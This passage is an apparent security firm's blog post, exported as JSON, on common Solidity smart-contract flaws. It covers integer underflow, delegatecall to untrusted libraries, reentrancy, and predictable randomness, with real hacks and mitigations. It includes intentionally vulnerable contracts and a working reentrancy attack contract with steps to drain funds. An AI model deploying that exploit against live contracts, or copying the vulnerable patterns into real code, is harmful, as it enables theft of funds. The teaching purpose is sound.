#808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">The <\/span><span style=\"font-weight: 400; color: #ff0000;\">require<\/span> <span style=\"font-weight: 400;\">condition in the <\/span><span style=\"font-weight: 400;\">transfer <\/span><span style=\"font-weight: 
400;\">function might<\/span> <span style=\"font-weight: 400;\">look correct at first glance, but only until you realize that operations between two uints produce a uint value. It means that the \u00a0<\/span><span style=\"font-weight: 400;\">balances[msg.sender] - _value &gt;= 0 <\/span><span style=\"font-weight: 400;\">condition is always satisfied, because a uint minus uint operation produces a uint, and a uint is always greater than or equal to 0<\/span><span style=\"font-weight: 400;\">. <\/span><span style=\"font-weight: 400;\">A<\/span> <span style=\"font-weight: 400;\">malicious user can spend more funds than he owns, because of the contract\u2019s faulty <\/span><span style=\"font-weight: 400; color: #ff0000;\">require<\/span> <span style=\"font-weight: 400;\">condition. Furthermore, a malicious user can take possession of a very large amount of tokens by transferring more tokens than he owns, because his balance will underflow to a very large integer value. E.g., if a malicious user owns 100 tokens and he tries to transfer 101 tokens, then he will end up with 100 - 101 tokens, which equals the maximum uint value of (2\u00b2\u2075\u2076-1) tokens.<\/span><\/p>\n<p><b>Real World Example:<\/b><span style=\"font-weight: 400;\"> Developers responsible for POWH Coin didn\u2019t secure uint operations in withdrawing logic against overflow\/underflow, and an unknown hacker was able to withdraw an infinite number of PoWH\u2019s tokens and drained the whole contract\u2019s balance equal to 2000 ETH (~2.3M USD at the time).<\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> Watch out for variables with unsigned integer type and keep in mind the possibility of overflow and underflow.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> It is recommended to use OpenZeppelin\u2019s <\/span><a href=\"https:\/\/github.com\/OpenZeppelin\/zeppelin-solidity\/blob\/master\/contracts\/math\/SafeMath.sol\"><span style=\"font-weight: 
400;\">SafeMath library<\/span><\/a><span style=\"font-weight: 400;\"> to avoid overflows and underflows.<\/span><\/p>\n<p><b>Note:<\/b><span style=\"font-weight: 400;\"> Overflow and underflow behavior might become a problem of the past if a future version of Solidity is changed to throw an exception instead of allowing unsigned integers to overflow\/underflow. There is an ongoing <\/span><a href=\"https:\/\/github.com\/ethereum\/solidity\/issues\/796\"><span style=\"font-weight: 400;\">discussion<\/span><\/a><span style=\"font-weight: 400;\"> about this topic in the Ethereum community.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cUsing external libraries is safe\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Solidity offers a low-level <\/span><span style=\"font-weight: 400; color: #ff0000;\">delegatecall<\/span><span style=\"font-weight: 400;\"> function which allows contract A (calling contract) to execute a function of contract B (called contract) in the context of contract A. 
This function is very convenient when there is a need to run\/reuse code of an external library, but it poses a significant security risk because it grants the called contract\/library full access to the state of the calling contract.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Let&#8217;s use the following example to demonstrate how an attacker can misuse <\/span><span style=\"font-weight: 400; color: #ff0000;\">delegatecall<\/span><span style=\"font-weight: 400;\"> in a naive contract to steal its balance or take ownership of it via a dangerous library.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract DangerousLibrary {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0address public owner;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function safeAndUsefulFunction1() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ do something safe and useful<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function safeAndUsefulFunction2() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ do something safe and useful<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function dangerousFunction1() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0selfdestruct(msg.sender);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: 
#808080;\"> \u00a0\u00a0\u00a0function dangerousFunction2() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0owner = msg.sender;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract NaiveContract { <\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0address public owner;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0address libraryAddress;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0constructor(address _libraryAddress) public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0libraryAddress = _libraryAddress;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0owner = msg.sender;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function callSafeAndUsefulLibraryFunction() public{<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0libraryAddress.delegatecall(msg.data); <\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">When an attacker calls NaiveContract\u2019s <\/span><span style=\"font-weight: 400;\">callSafeAndUsefulLibraryFunction<\/span><span style=\"font-weight: 400;\"> function with call data that contains the signature of one of the dangerous functions of the dangerous library, the attacker can destroy the instance of 
NaiveContract and send the balance of NaiveContract to himself or can take ownership of NaiveContract.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">An example of call data that would invoke a dangerous function is: <\/span><span style=\"font-weight: 400;\">bytes4(keccak256(&quot;dangerousFunction1()&quot;))<\/span><\/p>\n<p><b>Real World Example: <\/b><span style=\"font-weight: 400;\">This type of attack was used in the <\/span><a href=\"https:\/\/medium.freecodecamp.org\/a-hacker-stole-31m-of-ether-how-it-happened-and-what-it-means-for-ethereum-9e5dc29e33ce\"><span style=\"font-weight: 400;\">Parity Hack<\/span><\/a><span style=\"font-weight: 400;\">, where an unknown attacker stole 150,000 ETH (~30M USD at the time).<\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> Never use <\/span><span style=\"font-weight: 400; color: #ff0000;\">delegatecall<\/span><span style=\"font-weight: 400;\"> with arbitrary data in your contract. <\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> Avoid using <\/span><span style=\"font-weight: 400; color: #ff0000;\">delegatecall<\/span><span style=\"font-weight: 400;\"> if you can; if you decide to use it, think twice about whether the library you are about to call can be trusted.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cSending funds with call function is safe\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Solidity offers 3 functions to send funds: <\/span><span style=\"font-weight: 400; color: #ff0000;\">send, transfer <\/span><span style=\"font-weight: 400;\">and<\/span><span style=\"font-weight: 400; color: #ff0000;\"> call<\/span><span style=\"font-weight: 400;\">. The most significant difference between the first two and the third one is that <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> by default forwards all remaining gas. 
It means that if the receiver of funds is a contract, then the receiving payable function can use the forwarded gas to execute additional logic\/code.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The following contract shows how using <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> can lead to serious security flaws.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract Bank {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0mapping(address =&gt; uint) balances;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function deposit() public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[msg.sender] += msg.value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function withdraw(uint _amount) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(balances[msg.sender] &gt;= _amount);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(msg.sender.call.value(_amount)());<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[msg.sender] -= _amount;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function balanceOf(address _who) public view returns (uint) {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0return balances[_who];<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function getTotalBalance() public view 
returns (uint){<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0return address(this).balance;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0} <\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">The Bank contract\u2019s <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function has two weaknesses:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It uses <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> to send funds<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It reduces the message sender\u2019s balance after it sends the requested amount to the message sender<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">The combination of these weaknesses makes the <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function vulnerable to a reentrancy attack.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">An attacker would be able to drain the Bank contract\u2019s balance via a reentrancy attack with the following malicious contract:<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">interface Bank {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0function deposit() external payable;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0function withdraw(uint _amount) external;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract MaliciousContract {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0Bank 
bank;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0constructor(address _address_to_attack) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bank = Bank(_address_to_attack);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function deposit() public payable{<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bank.deposit.value(msg.value)();<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function withdraw(uint _amount) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bank.withdraw(_amount);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0} <\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function() payable public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (address(bank).balance &gt;= 1 ether){<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bank.withdraw(1 ether);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function getBalance() public view returns (uint){<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> 
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return address(this).balance;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0} \u00a0<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">An attacker would first deploy the MaliciousContract contract with the address of the Bank contract instance as the constructor <\/span><span style=\"font-weight: 400;\">_address_to_attack <\/span><span style=\"font-weight: 400;\">parameter. Then he would deposit 1 ETH to the Bank contract instance via the <\/span><span style=\"font-weight: 400;\">deposit<\/span><span style=\"font-weight: 400;\"> function of MaliciousContract, which would increase the MaliciousContract instance\u2019s balance in the Bank contract to 1 ETH. Now MaliciousContract is ready to execute the reentrancy attack. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">MaliciousContract would initiate the reentrancy attack by withdrawing 1 ETH from Bank via its <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function. When the Bank contract sends the requested 1 ETH to MaliciousContract via the low-level <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> function in its <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function, the MaliciousContract receiving function (fallback function) is forwarded all remaining gas. It can invoke the Bank contract\u2019s <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function again, which would send one additional ETH to MaliciousContract because MaliciousContract\u2019s balance in the Bank contract hasn\u2019t been decreased yet. 
This recursive invocation of Bank\u2019s <\/span><span style=\"font-weight: 400;\">withdraw <\/span><span style=\"font-weight: 400;\">function from<\/span> <span style=\"font-weight: 400;\">MaliciousContract\u2019s payable fallback function would stop once Bank\u2019s balance is empty or the transaction runs out of gas.<\/span><\/p>\n<p><b>Real World Hack: <\/b><span style=\"font-weight: 400;\">This type of attack was used during <\/span><a href=\"http:\/\/hackingdistributed.com\/2016\/06\/18\/analysis-of-the-dao-exploit\/\"><span style=\"font-weight: 400;\">TheDAO hack<\/span><\/a><span style=\"font-weight: 400;\"> when an unknown attacker stole 3.5M ETH (~50M USD at the time). This event led to an Ethereum hard fork which produced 2 separate coins: Ethereum and Ethereum Classic. <\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> Sending funds via the <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> function is dangerous because it forwards all remaining gas, which allows the attacker to run potentially malicious code in the payable function. <\/span><\/p>\n<p><b>How to mitigate:<\/b><\/p>\n<ol>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Use <\/span><span style=\"font-weight: 400; color: #ff0000;\">send<\/span><span style=\"font-weight: 400;\"> or <\/span><span style=\"font-weight: 400; color: #ff0000;\">transfer<\/span><span style=\"font-weight: 400;\"> functions instead of <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> to send funds, because they do not forward enough gas to execute malicious code. 
<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">If you have to use the <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> function (e.g., the receiving function requires more than 2300 gas to execute its code), then make sure that you follow the <\/span><a href=\"http:\/\/solidity.readthedocs.io\/en\/v0.4.21\/security-considerations.html#re-entrancy\"><span style=\"font-weight: 400;\">Checks-Effects-Interactions<\/span><\/a> pattern.\u00a0<span style=\"font-weight: 400;\">The message sender\u2019s balance should be adjusted before funds are sent in order to make the <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function of the Bank contract \u201creentrancy-safe\u201d.<\/span><\/li>\n<\/ol>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\"> \u00a0function withdraw(uint _amount) public {<\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0\u00a0\u00a0require(balances[msg.sender] &gt;= _amount); \u00a0\u00a0\u00a0\/\/ <\/span><b>checks<\/b><\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0\u00a0\u00a0balances[msg.sender] -= _amount; \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ <\/span><b>effects<\/b><\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0\u00a0\u00a0require(msg.sender.call.value(_amount)()); \u00a0\u00a0\/\/ <\/span><b>interactions<\/b><\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">\u00a0 \u00a0 \u00a0 3. 
Another option is to use a mutex (exclusive lock) in the withdraw function, which would ensure that the withdraw function cannot be re-entered until the balance is adjusted and the lock is released.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\"> \u00a0function withdraw(uint _amount) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(!is_withdrawing[msg.sender]);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(balances[msg.sender] &gt;= _amount);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0is_withdrawing[msg.sender] = true;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(msg.sender.call.value(_amount)());<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[msg.sender] -= _amount;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0is_withdrawing[msg.sender] = false;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cIt is easy to generate random number\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">To generate a pseudo-random number, you need a seed. Hiding your seed on the blockchain is not possible, because everything is visible to everyone. It might be tempting to use one of the apparently \u201chard-to-predict\u201d block variables &#8211; like block-hash and block timestamp &#8211; as a source of entropy, but these variables can, to a certain extent, be predicted and influenced by miners. 
A malicious miner can precalculate the block-hash or set the block timestamp to the desired value to exploit a contract\u2019s function that relies on the unpredictability of block variables.<\/span><\/p>\n<p><b>Real World Hack:<\/b><span style=\"font-weight: 400;\"> Creators of <\/span><a href=\"https:\/\/smartbillions.com\/\"><span style=\"font-weight: 400;\">SmartBillions <\/span><\/a><span style=\"font-weight: 400;\">used the <\/span><a href=\"https:\/\/solidity.readthedocs.io\/en\/v0.4.24\/units-and-global-variables.html#block-and-transaction-properties\"><span style=\"font-weight: 400;\">block.blockhash<\/span><\/a><span style=\"font-weight: 400;\"> function to generate lottery numbers and <\/span><a href=\"https:\/\/www.reddit.com\/r\/ethereum\/comments\/74d3dc\/smartbillions_lottery_contract_just_got_hacked\/\"><span style=\"font-weight: 400;\">they lost 400 ETH<\/span><\/a><span style=\"font-weight: 400;\"> (~125k USD at the time) due to this mistake.<\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> It is challenging to generate a random number on the blockchain.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> Do not use block variables (block-hash, block timestamp, etc.) to generate random numbers. <\/span><a href=\"https:\/\/blog.positive.com\/predicting-random-numbers-in-ethereum-smart-contracts-e5358c6b8620\"><span style=\"font-weight: 400;\">Here<\/span><\/a><span style=\"font-weight: 400;\"> you can read more about why not to use block variables when aiming for randomness.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h1><span style=\"font-weight: 400;\">Conclusion<\/span><\/h1>\n<p><span style=\"font-weight: 400;\">The success of Ethereum and Solidity is primarily determined by the user\u2019s level of confidence in its ability to operate safely and keep funds secured. Every hacked smart contract and every token stolen leaves hard-to-fade scars on Ethereum\u2019s and Solidity\u2019s reputation. 
In order to deliver smart contracts with the highest security standards, it is necessary for a smart contract developer to:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Stay up-to-date with latest developments in Solidity language and Ethereum platform<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Follow best practices, security recommendations and smart contract security patterns from Solidity documentation and leading smart contract security organizations \u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Employ security audits performed by professional external smart contract auditors<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">We offer comprehensive <a href=\"https:\/\/nethemba.com\/services\/application-security\/smart-contracts-security-audit\/\" target=\"_blank\" rel=\"noopener\"><strong>Smart contracts security audit<\/strong><\/a>. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">If you are interested in getting your smart contract audited by the team of smart contract experts, please contact us at <\/span><a href=\"mailto:sales@nethemba.com\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">sales@nethemba.com<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction Cryptocurrencies and blockchain technology gained a lot of attention in the last year due to increasing mainstream adoption and new use cases. Thanks to hundreds of completed ICOs launched on Ethereum platform, Solidity is one of the most popular languages for smart contracts development. 
With billions of dollars at play and relatively low-level of [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[13],"tags":[1177,1178,1179,1180,1181,34,1182,1183,1184,1185],"class_list":["post-2791","post","type-post","status-publish","format-standard","hentry","category-uncategorized-sk","tag-blockchain-sk","tag-crypto-sk","tag-cryptocurrencies-sk","tag-ethereum-sk","tag-ico-sk","tag-it-security","tag-security-audit-sk","tag-security-vulnerabilities-in-solidity-sk","tag-smart-contracts-sk","tag-solidity-sk"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Summary of the common smart contracts vulnerabilities - Nethemba<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\" \/>\n<meta property=\"og:locale\" content=\"sk_SK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Summary of the common smart contracts vulnerabilities - Nethemba\" \/>\n<meta property=\"og:description\" content=\"Introduction Cryptocurrencies and blockchain technology gained a lot of attention in the last year due to increasing mainstream adoption and new use cases. Thanks to hundreds of completed ICOs launched on Ethereum platform, Solidity is one of the most popular languages for smart contracts development. 
With billions of dollars at play and relatively low-level of [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\" \/>\n<meta property=\"og:site_name\" content=\"Nethemba\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/nethemba\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-25T07:49:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-05-28T05:58:57+00:00\" \/>\n<meta name=\"author\" content=\"Pavol Lupt\u00e1k\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@nethemba\" \/>\n<meta name=\"twitter:site\" content=\"@nethemba\" \/>\n<meta name=\"twitter:label1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pavol Lupt\u00e1k\" \/>\n\t<meta name=\"twitter:label2\" content=\"Predpokladan\u00fd \u010das \u010d\u00edtania\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 min\u00fat\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\"},\"author\":{\"name\":\"Pavol Lupt\u00e1k\",\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\"},\"headline\":\"Summary of the common smart contracts vulnerabilities\",\"datePublished\":\"2018-05-25T07:49:34+00:00\",\"dateModified\":\"2018-05-28T05:58:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\"},\"wordCount\":3221,\"commentCount\":0,\"keywords\":[\"blockchain\",\"crypto\",\"cryptocurrencies\",\"Ethereum\",\"ICO\",\"IT security\",\"security audit\",\"security vulnerabilities in 
Solidity\",\"smart contracts\",\"Solidity\"],\"articleSection\":[\"Uncategorized @sk\"],\"inLanguage\":\"sk-SK\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\",\"url\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\",\"name\":\"Summary of the common smart contracts vulnerabilities - Nethemba\",\"isPartOf\":{\"@id\":\"https:\/\/nethemba.com\/de\/#website\"},\"datePublished\":\"2018-05-25T07:49:34+00:00\",\"dateModified\":\"2018-05-28T05:58:57+00:00\",\"author\":{\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\"},\"breadcrumb\":{\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#breadcrumb\"},\"inLanguage\":\"sk-SK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/nethemba.com\/sk\/domov\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Summary of the common smart contracts 